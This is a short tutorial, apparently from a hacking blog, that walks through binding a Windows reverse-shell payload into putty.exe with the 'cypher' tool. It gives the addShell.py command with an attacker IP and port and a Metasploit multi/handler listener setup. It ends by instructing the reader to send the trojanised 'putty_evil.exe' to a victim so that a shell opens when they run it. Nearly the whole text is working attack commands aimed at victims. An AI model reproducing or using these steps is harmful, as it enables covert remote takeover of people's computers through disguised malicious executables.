First clone cypherrepository from github, to do so type:
git clone https://github.com/xan7r/cypher.git
Now choose an executable file and copy to cypher folder to bind the cypherwith any .exe file
Here in my case I have copied putty.exe as a file to bind with cipher
Note: only executable file can be binded.
Now run the following command
python addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 -p 0
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed. Start metasploit using msfconsole
use exploit/multi/handler
set payload windows/shell_reverse_tcp
set lhost 192.168.0.105
set lport 4444
exploit
Now send the binded putty_evil .exe to the victim, as soon as he opens the file a shell session will open





